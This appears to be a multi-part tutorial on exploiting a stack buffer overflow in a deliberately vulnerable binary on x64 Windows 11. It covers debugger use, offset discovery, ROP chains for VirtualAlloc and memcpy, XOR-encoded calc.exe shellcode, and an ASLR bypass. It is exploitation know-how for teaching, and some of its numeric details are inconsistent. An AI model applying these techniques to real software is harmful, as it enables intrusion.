Learning Objectives
- Disable Windows 11 Core Isolation and Exploit Protection for controlled learning
- Compile the vulnerable binary with stack protections disabled using MinGW-w64
- Navigate x64dbg — set breakpoints, step through instructions, inspect registers and stack
- Manually redirect RIP to an unreachable function using the debugger
- Understand why x64 buffer overflows use ROP rather than JMP RSP
The Challenge — x64 on Windows 11
Stack-based buffer overflows on x64 Windows 11 are a fundamentally different problem from the x86 exploits that filled offensive security courses for the past two decades. DEP is always-on at the hardware level. ASLR randomizes module base addresses every boot. Stack canaries are the default in modern compilers. The techniques that worked in 2010 crash immediately on a fully patched Windows 11 24H2 machine.
This series was born from a personal challenge: successfully exploit a buffer overflow on the latest fully-patched Windows 11, bypassing all modern mitigations. The answer is Return Oriented Programming (ROP) — reusing the program's existing instructions rather than injecting new code. This module sets up the environment and teaches the debugger before we touch any exploit code.
Step 1 — Disable Windows Protections for Learning
Before building the exploit we need a controlled environment. Parts 1–4 deliberately disable Windows security features so we can learn the core mechanics without fighting multiple protections at once. Part 5 re-enables everything and demonstrates ASLR bypass. This is the correct pedagogical order — learn the technique cleanly first, then add complexity.
Two locations to toggle off in Windows Security:
-
Navigate to: Windows Security → Device Security → Core Isolation → Core Isolation Details
Disable all toggles in this section including Memory Integrity. These features enforce integrity checks on code running in the kernel and restrict memory operations that our exploit will rely on. Disabling them for the learning environment does not permanently weaken your system — re-enable them after completing Parts 1–4.
⚠ Disabling Memory Integrity requires a reboot. You may see a notification in the taskbar warning that protection is reduced — this is expected during the lab phase. -
Navigate to: Windows Security → App & Browser Control → Exploit Protection → System Settings
Disable DEP, ASLR, SEHOP, and all other protections listed. DEP (Data Execution Prevention) is the primary barrier — it prevents executing code on the stack. Even after disabling it here, hardware-level DEP (enforced by the NX bit on the CPU) may remain active. The series acknowledges this and addresses it in Part 3 using VirtualAlloc to create a separate RWX memory region rather than executing on the stack directly.
💡 Hardware DEP on modern x64 CPUs cannot be fully disabled by software settings alone. This is why the exploit uses VirtualAlloc + memcpy to move shellcode to a proper RWX region rather than attempting to execute directly from the stack.
Step 2 — The Vulnerable Binary
The target binary is purpose-built for this series. It includes several intentional design choices that make it exploitable and also provide the primitives we'll need for the full exploit chain:
Compile Flags — What Each Does and Why It Matters
-
Basic x64dbg workflow for this series:
- File → Open → select overflow.exe to load it
- Run (F9) twice — first run executes to the entry point, second gets the program running
- Set breakpoint — double-click on an address in the disassembly panel to toggle a breakpoint (red highlight)
- Step Over (F8) — execute the current instruction without following calls into functions
- Step Into (F7) — follow a CALL instruction into the called function
- Registers panel (top right) — shows current value of all 64-bit registers; changed values highlight in red
- Stack panel (bottom right) — shows the stack contents at RSP; critical for watching ROP gadget execution
💡 On a laptop with Fn key: use Fn+F8 for step over and Fn+F7 for step into. The function key behavior varies by laptop manufacturer. -
In x86 buffer overflows the classic technique is: overwrite EIP with the address of a
JMP ESPgadget, place shellcode on the stack, and when EIP jumps to the gadget it executesJMP ESPwhich jumps directly into the shellcode on the stack.This doesn't work in x64 for two reasons:
- DEP/NX: hardware-enforced non-executable stack. Even if you redirect RIP to the stack, the CPU raises a fault before executing any instruction there. This cannot be defeated by software settings.
- RIP canonicality: x64 RIP must contain a canonical address. After a buffer overflow, the value you see in RIP may not directly control execution the way EIP did in x86 — the next instruction is determined by what's on the stack and what
RETpops.
ROP solves both: we chain together existing executable code snippets already in the binary (in read+execute memory, not the stack). Each gadget ends with
RET, which pops the next gadget address from our controlled stack. No new code is executed on the stack — we're reusing what's already there. -
Part 1 demonstrates debugger control before any exploit code. The workflow:
- Load overflow.exe in x64dbg and run it
- Find the address of
win_function()in the disassembly — note it (around0x14000158C) - Set a breakpoint at the instruction after the
std::cincall (0x1400015FB) - Enter any input in the command prompt window
- Hit the breakpoint, then press F8 twice
- Double-click the RIP value in the register panel and type the address of win_function
- Press F8 to execute — calc.exe launches despite never being called by the program
This manual RIP manipulation is exactly what the buffer overflow automates in Part 2 — instead of typing in the address by hand, the overflow payload overwrites the return address on the stack so that when the function returns, it returns to
win_function().
Learning Objectives
- Determine the exact byte offset needed to reach the return address (296 bytes)
- Use Python's subprocess and struct modules to craft and deliver a buffer overflow payload
- Attach x64dbg to a running process and verify stack control
- Observe how the overflow reaches the return address without placing it directly in RIP
Finding the Offset — 296 Bytes
The buffer is declared as char buffer[275] but the overflow needs 296 bytes to reach the saved return address on the stack. The extra 21 bytes account for the function's stack frame overhead — saved registers, alignment padding, and the gap between the buffer start and the saved RIP location. Finding this value typically involves sending increasing amounts of data until the stack shows control at the return address position, or using a cyclic pattern tool like pwndbg's cyclic function.
Having written the vulnerable program ourselves gives the shortcut of knowing the buffer is 275 bytes — adding 20–30 bytes to find the exact offset is quick empirical work.
Why We Don't See the Address in RIP
A common point of confusion for developers coming from x86: after the overflow, the address of win_function() does not appear in the RIP register. Instead, you'll see other registers (like RSP-relative values) showing 0x41414141 fill from the junk bytes. The overflow address is on the stack, waiting to be popped into RIP when the next RET instruction executes.
This is the fundamental shift from x86 thinking to x64 ROP thinking: stop watching RIP, watch the stack. RIP is just executing whatever the current RET pops. The attack surface is the stack contents, not RIP's current value.
-
The Python script pauses before sending the payload to allow attaching the debugger. In x64dbg:
- File → Attach (or Alt+A) → find overflow.exe in the process list → double-click
- x64dbg attaches and breaks. Your previously set breakpoints should still be active.
- Press F9 (Run) to let the process continue waiting for input
- Switch back to the Python terminal and press Enter to send the payload
- x64dbg should hit the breakpoint at
0x1400015FB
💡 The attach workflow is important because it mirrors real-world exploitation — you don't get to compile the target with debug symbols or control its launch. Attaching to a running process is the standard approach. -
win_function()begins with stack alignment/setup instructions (function prologue). Since we're redirecting execution via a RET instruction rather than a CALL, the stack is already set up by the calling convention. Jumping to the very first instruction of a function that assumes CALL semantics can cause a stack misalignment crash.0x14000158Cis the address insidewin_function()after the prologue — at the point where the actual work (printing and calling calc.exe) begins. The stack is already aligned at this point, so execution proceeds cleanly.In later parts when we're building real ROP chains, this distinction becomes critical: ROP gadgets themselves don't have prologues — they're just mid-function code sequences ending in RET, and the stack state is whatever our ROP chain has constructed.
-
DEP (Data Execution Prevention) marks the stack as non-executable at the hardware level via the CPU's NX (No-Execute) bit. When the CPU attempts to execute an instruction at a non-executable memory address, it raises a hardware fault (#PF with execute-disable) before the instruction runs.
This is why the classic x86 technique — place shellcode in the buffer, redirect EIP/RIP to it — fails on modern Windows. Even if you successfully overwrite the return address to point into the buffer, the CPU refuses to execute from there.
The solution (covered in Part 3): use VirtualAlloc to allocate a new memory region with
PAGE_EXECUTE_READWRITEpermissions. The stack remains non-executable, but the newly allocated region is, and we copy our shellcode there with memcpy before jumping to it.
Learning Objectives
- Use Ropper and ROPgadget to enumerate available gadgets in the vulnerable binary
- Construct a ROP chain to set RCX, RDX, R8, and R9 for a VirtualAlloc call
- Understand why some registers (R8, R9) require creative multi-gadget chains
- Find the address of a specific constant value in memory using x64dbg's memory search
- Chain gadgets to execute VirtualAlloc and allocate RWX memory for shellcode
What Are ROP Gadgets?
ROP (Return Oriented Programming) gadgets are short instruction sequences already present in the binary's executable sections, each ending with a RET instruction. Because they already exist in executable memory, DEP doesn't prevent their execution. By chaining their addresses on the stack, we control what code executes simply by controlling where each RET goes.
The goal here is to call VirtualAlloc(NULL, 1024, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) entirely through ROP — no shellcode, no executable stack. We need to set four registers to specific values:
Finding Gadgets — Ropper and ROPgadget
Setting RCX = 0 (Easy)
The XOR ecx, ecx pattern — the canonical null-free zeroing technique — is the simplest register setup. Writing to ECX (32-bit) zero-extends into RCX (64-bit), so a single gadget is enough:
Setting RDX = 1002 (Moderate)
No direct mov rdx, 1000 gadget exists. The creative solution: find a pop rax; ret gadget, load the memory address where 0x1000 is stored in the binary (found via memory search in x64dbg), dereference it into RAX, then add it to EDX. The result is 1002 (2 + 1000) — more than enough allocation size:
Setting R8 = 0x3000 and R9 = 0x40 (Hard)
R8 and R9 are the most used sparingly in the binary's code, meaning few gadgets directly manipulate them. The solution involves routing values through RAX and RBX as intermediaries. R9 in particular is "hated" — it requires a gadget that also includes add rsp, 0x48, which advances the stack pointer by 72 bytes, requiring NOP sled padding in the chain to compensate:
-
A key technique from Part 3: when you need to load a specific value into a register but can't find a
mov reg, immgadget, find a location in the binary's data section where that value already exists and use a memory dereference gadget (mov eax, dword ptr [rax]) to load it.In x64dbg: Memory Map tab → right-click the binary's section → Search for Pattern → enter the hex value you need. The tool returns all addresses where that byte sequence appears. Pick the first result in the binary's own memory range (not a DLL).
- Value
0x1000(1000 decimal for dwSize) was found at0x1400000AC - Value
0x0040(0x40 = PAGE_EXECUTE_READWRITE) was found at0x140000018 - Value
0x3000(MEM_COMMIT|MEM_RESERVE) was found at0x1400095AC
💡 This technique works because the compiler often embeds constant values from the source code into the binary's .text or .rdata sections. A statically linked binary is particularly rich because it includes the entire C runtime library with its own constants. - Value
-
Real ROP chains almost never use gadgets that do exactly one thing. The reality is you work with whatever the binary provides. Common side effects and how to handle them:
- Extra POPs — a gadget that pops into registers you don't care about. Solution: pad those stack positions with junk values (0x90909090 works well as it's a NOP sled in x86, harmless as a value).
- add rsp, N — advances the stack pointer, skipping over N bytes of your carefully laid chain. Solution: pad those N bytes with NOPs after the gadget address in your payload.
- Clobbering registers — a gadget that sets a register you already set. Solution: order your gadgets carefully — set the clobbered register after the gadget that clobbers it.
- CALLs inside gadgets — some gadgets include a CALL that returns to RSP. Solution: ensure the call target (usually another ROP gadget address already in RAX) is already set up before the gadget runs.
This creativity is what makes ROP chain development genuinely difficult. It's less programming and more puzzle-solving with the specific pieces available in your binary.
Learning Objectives
- Understand why std::cin requires encoding — bad characters that break payload delivery
- XOR-encode shellcode with key 0xAC and embed a self-decoding stub
- Build a ROP chain to call memcpy and copy shellcode from stack to the VirtualAlloc'd region
- Understand the NOP sled's role in the final payload layout
- Assemble the complete exploit: shellcode + padding + ROP chain for VirtualAlloc + memcpy
The Bad Character Problem
std::cin >> buffer stops reading at whitespace characters (0x20, 0x09, 0x0A, 0x0D) and null bytes (0x00). This means any shellcode or ROP gadget address containing these bytes will truncate the payload. The solution is XOR encoding: transform every byte so none of the problematic values appear in the payload, then include a decoder stub that restores the original bytes at runtime before execution.
XOR Encoding with Key 0xAC
The key 0xAC was chosen because XOR-ing the shellcode bytes with it produces no bad characters. The encoded payload is safe to send through std::cin. At runtime, the decoder stub XORs each byte back with 0xAC to restore the original shellcode before jumping to it.
The Decoder Stub
The decoder stub is a small assembly routine prepended to the encoded shellcode. It XORs each byte back with the key at runtime, restoring the original shellcode in-place before jumping to it. This stub must itself be written in bytes that are safe to deliver — no bad characters in the stub encoding either.
memcpy ROP Chain — Copying Shellcode Off the Stack
After VirtualAlloc returns (the allocated address is in RAX), we chain into memcpy to copy the encoded shellcode from the stack into the RWX region. memcpy uses RCX (dst), RDX (src), R8 (size). The destination is the VirtualAlloc'd address (returned in RAX after the VirtualAlloc call). Source is the stack address where our shellcode sits. Size is 251 bytes (decoder stub + encoded shellcode).
-
A NOP sled (
\x90bytes) is placed before the decoder stub in the payload. Its purpose: when the memcpy copies the shellcode section to the RWX region and we jump to it, slight imprecision in the jump target address (due to register arithmetic approximation in the ROP chain) might land a few bytes before or after the exact decoder stub start. The NOP sled provides a "landing strip" — any of the 8 NOPs will slide execution forward to the decoder stub.8 bytes of NOP sled is minimal but sufficient given how the RDX (source pointer) is calculated from known stack offsets. Longer NOP sleds provide more tolerance for imprecision at the cost of payload size.
💡 NOP sleds are also useful in x64 debugging — if your shellcode doesn't execute, step through the jump target in x64dbg. If you see a solid block of0x90instructions being executed, your landing is correct. If you see garbage, the source pointer calculation is off. -
The trickiest part of the memcpy chain: figuring out RDX (the source address — where on the stack does our shellcode actually live?). The stack address at the time of the overflow is predictable relative to the stack state after the ROP chain starts.
The approach used: RSP points near the start of the ROP chain after the overflow. The shellcode is located at a known negative offset from RSP (it was placed before the junk padding). By tracking how RSP changes through each ROP gadget (each
popandretadvances RSP by 8, eachpushdecreases it), you can calculate the exact offset and add it to the current RSP value to get the shellcode's address.The blog series uses:
add edx, eaxwhere EAX holds the RSP-relative offset (calculated empirically from x64dbg observation) to set RDX to the shellcode's stack address. This is why the Part 4 payload has a specific pre-calculated value for the source pointer — it was determined by stepping through the exploit in x64dbg and reading the actual stack address. -
The calc.exe payload used in this exploit is the same IAT-walking shellcode from the x64 Assembly and Shellcoding course — 207 bytes, fully NULL-free, dynamically resolving WinExec from kernel32.dll's export table at runtime via the PEB walk technique.
This is why the shellcoding course matters for exploit development: you need payloads that work without knowing exact DLL load addresses at compile time. The IAT-walking approach works regardless of ASLR because it resolves API addresses dynamically at runtime, not at exploit-construction time.
The XOR encoding adds another layer: even though the shellcode itself is NULL-free, std::cin imposes additional bad character restrictions. The 0xAC key was specifically chosen by iterating over possible keys until one produced no bad characters in the encoded output.
Learning Objectives
- Understand exactly what ASLR randomizes — and what it doesn't
- Use Python's psutil and ctypes to programmatically retrieve the base address of a running process
- Calculate dynamic ROP gadget addresses by adding fixed offsets to the runtime base
- Re-enable all Windows 11 security features and run the full working exploit
Re-Enable All Protections — The Real Challenge Begins
For Part 5, re-enable everything that was disabled for Parts 1–4:
- → Core Isolation (all options including Memory Integrity)
- → Exploit Protection (DEP, ASLR, SEHOP, all system settings)
- → Secure Boot (verify in BIOS/UEFI settings)
With everything re-enabled, the Part 4 exploit fails immediately — the hardcoded 0x140001f8c addresses are now wrong because ASLR has randomized the binary's base address. The fix is straightforward: stop hardcoding addresses and discover them at runtime.
What ASLR Actually Randomizes
The key insight that makes ASLR bypassable here: ASLR randomizes the base address (the first half of the address), but the offset within the module (the second half) remains constant. A gadget at 0x140001f8c with ASLR disabled becomes, say, 0x00d8001f8c with ASLR enabled — only the upper portion changed. The 1f8c offset is always the same relative to the module base.
This means all our ROP gadget addresses can be expressed as base_addr + offset. We just need to discover base_addr at runtime, and we can reconstruct every gadget address dynamically.
Converting Static Addresses to Dynamic
The only change to the Part 4 exploit is replacing every hardcoded 0x14000XXXX address with base_addr + 0xXXXX. The offsets (the last four hex digits) never change regardless of ASLR. With base_addr discovered at runtime, every ROP gadget is recalculated correctly for the current run.
-
ASLR randomizes the module base address — the starting VA where the executable or DLL is mapped. It does not change the relative layout within the module. Every function, every instruction, every ROP gadget is at a fixed position relative to the base.
The randomization in practice: on 64-bit Windows, only bits 17–28 (or similar — the exact range depends on the OS version) of the base address are randomized. This provides roughly 2^12 = 4096 possible positions for any module, which is relatively weak compared to full 64-bit randomization. In this series, even those randomized bits are defeated by reading the base address directly from the running process.
⚠ The ability to read the base address from the process using OpenProcess requires the exploit code to be running in the same user context as the target. In a remote exploitation scenario (over a network), base address leakage requires a separate information-disclosure vulnerability. -
The binary in Parts 1–4 was compiled with
-no-pie(no Position Independent Executable). Part 5 re-enables Windows ASLR but keeps the binary compiled with-no-pie. This is the scenario where "a developer forgot to compile with full security hardening."A fully PIE binary would require a different approach since the binary's internal layout relative offsets can also shift. The key difference:
- -no-pie with ASLR: binary may still be moved by ASLR to a random base. The internal offsets (gadget addresses relative to base) remain fixed. Our approach works.
- Full PIE + ASLR: both the base address and potentially other layout aspects are randomized. Defeating this typically requires an information leak (a way to read an address from the binary's memory) to compute gadget addresses at runtime.
💡 In real-world exploitation, information disclosure vulnerabilities (format string bugs, use-after-free with leak, etc.) are often combined with memory corruption bugs precisely to defeat PIE+ASLR. The "leak first, then exploit" pattern is fundamental to modern binary exploitation. -
The complete payload structure for the final Part 5 exploit (all protections enabled):
- Position 0–249: NOP sled (8) + decoder stub (35) + encoded shellcode (207) = 250 bytes
- Position 250–295: 46 bytes of padding to reach return address offset (296)
- Position 296+: ROP chain begins (each gadget = 8 bytes):
- R9 gadget chain (set to 0x40) + NOP padding for stack skip
- R8 gadget chain (set to 0x3000)
- RCX gadget (set to 0)
- RDX gadget chain (set to 1002)
- VirtualAlloc call via jmp [rax]
- memcpy setup — R8 (size), RCX (dest from VirtualAlloc return), RDX (stack source)
- memcpy call
- jmp rax → execute decoded shellcode in RWX region
Total payload: approximately 700–900 bytes depending on NOP padding amounts for the R9 chain. Fits within typical buffer overflow scenarios.
-
This series covers the foundational exploit technique. The next layers of complexity in modern binary exploitation:
- Information leaks — defeating PIE requires leaking a memory address from the target process. Format string vulnerabilities, partial overwrites, and heap UAF bugs are common sources.
- Heap exploitation — stack overflows are rare in modern software due to stack canaries. Most real-world bugs today are heap-based (use-after-free, heap overflow, type confusion).
- Kernel exploitation — once user-land mitigations are mature, attacking the OS kernel directly. Requires defeating KASLR (kernel ASLR) and additional kernel-mode mitigations.
- Browser exploitation — multi-stage exploits combining a renderer bug, a sandbox escape, and a privilege escalation. Each stage independently defeats one layer of the protection stack.
💡 The foundational skills from this series — debugger fluency, ROP chain construction, shellcode encoding, and systematic bypass methodology — apply directly to all of these advanced topics. The techniques scale up; the thinking stays the same.
overflow-static.zip and overflow4.zip linked in the blog posts.